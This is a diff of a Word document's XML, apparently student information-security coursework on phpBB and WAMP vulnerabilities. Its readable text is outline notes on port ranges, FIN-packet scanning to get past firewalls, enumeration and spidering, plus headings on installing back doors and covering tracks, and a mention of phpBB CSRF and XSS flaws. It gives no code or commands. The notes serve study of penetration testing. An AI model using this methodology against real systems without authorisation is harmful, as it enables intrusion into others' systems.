-        <w:t xml:space="preserve">1-1023 are </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>system</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: used by the OS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">1024-49151 are </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>registered</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> for a specific purpose</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">49152-65535 are </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>custom</w:t>
-      </w:r>
-      <w:r>
-        <w:t>; used for whatever the user wants.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Can just try and establish a TCP connection to the port:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Gives the system your IP address, details of the program used to connect, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ect</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>use sneaky manipulation of TCP protocol</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Send a TCP FIN Packet</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Does not make a connection attempt; circumvents firewall.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>If the port is in listen: no reply.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>If the port is closed: responds with reset.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="405"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Enumeration</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The process of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>validating the list</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>of users you acquired when foot-printing</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>The evaluation of how safe it is to go ahead with the attack.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A lengthy process that is usually automated. A case of measure twice and cut once.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="45"/>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Spidering</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Spidering</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is the automatic mapping of a website.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>A recursive program that follows all HTML links from the document</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Can revel </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="4" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
@@ -1892,66 +1703,46 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc445123124"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
         <w:t>Penetration/Attack</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
+        <w:pStyle w:val="Heading2"/>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc445123125"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Gain and maintain connection for objective to be completed.</w:t>
+        <w:t>Install back doors</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Install back doors </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc445123126"/>
       <w:r>
         <w:t>Covering Tracks</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -1977,7 +1768,7 @@
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc444877084"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc445123127"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000" w:themeColor="text1"/>
@@ -1985,7 +1776,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Conclusion</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -2037,7 +1828,7 @@
       <w:r>
         <w:t xml:space="preserve">Any version of phpBB2.x security can be exploited by a CRSF (Cross-site request forgery) attack. Looked this up briefly </w:t>
       </w:r>
-      <w:hyperlink r:id="rId9" w:history="1">
+      <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2050,8 +1841,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId10"/>
-      <w:footerReference w:type="default" r:id="rId11"/>
+      <w:headerReference w:type="default" r:id="rId12"/>
+      <w:footerReference w:type="default" r:id="rId13"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -2210,6 +2001,119 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="091053F8"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="67FCC6B0"/>
+    <w:lvl w:ilvl="0" w:tplc="A790C036">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="21503A6E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B64C11C4"/>
@@ -2349,7 +2253,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="25C0687D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A1C23AAA"/>
@@ -2461,7 +2365,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3A050D93"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FE20D18E"/>
@@ -2601,7 +2505,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BEE5602"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="89864440"/>
@@ -2741,7 +2645,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="457D12F5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F4BA2FEA"/>
@@ -2881,7 +2785,96 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="518239CA"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B0FC6444"/>
+    <w:lvl w:ilvl="0" w:tplc="0809000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="78EF40C1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F63CDFA2"/>
@@ -3022,22 +3015,28 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="2">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="4">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="3">
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="6">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="4">
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="8">
     <w:abstractNumId w:val="0"/>
-  </w:num>
-  <w:num w:numId="5">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
@@ -3482,6 +3481,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -3961,11 +3961,30 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<CoverPageProperties xmlns="http://schemas.microsoft.com/office/2006/coverPageProps">
+  <PublishDate/>
+  <Abstract>This assignment investigates security vulnerabilities within PHP software commonly used for hosting forums from a local WAMP server. A variety of older PHPBB versions and WAMP server are explored to locate and understand security issues that could be exploited. Methods of these exploits are researched and tested in this Document.</Abstract>
+  <CompanyAddress/>
+  <CompanyPhone/>
+  <CompanyFax/>
+  <CompanyEmail/>
+</CoverPageProperties>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
 <b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E4AF4333-EEA5-47BB-8C98-C03A33E7940B}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/coverPageProps"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5A887261-F2C6-4488-AF17-C4E16D166EB7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
+++ b/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
@@ -233,6 +233,7 @@
                                         <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                         <w:text/>
                                       </w:sdtPr>
+                                      <w:sdtEndPr/>
                                       <w:sdtContent>
                                         <w:p>
                                           <w:pPr>
@@ -511,6 +512,7 @@
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                   <w:text/>
                                 </w:sdtPr>
+                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -1356,6 +1358,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t>Infiltrate sensitive areas of the system or stop/deny services running.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
@@ -1594,6 +1601,35 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>PhpBB 2.0.19 Cross Site Request Forgeries and XSS Admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="8"/>
         </w:numPr>
@@ -1625,8 +1661,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> Other details such as security updates and software version expiry.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="3"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
@@ -1687,13 +1721,29 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc445123123"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc445123123"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
         <w:t>Enumeration</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
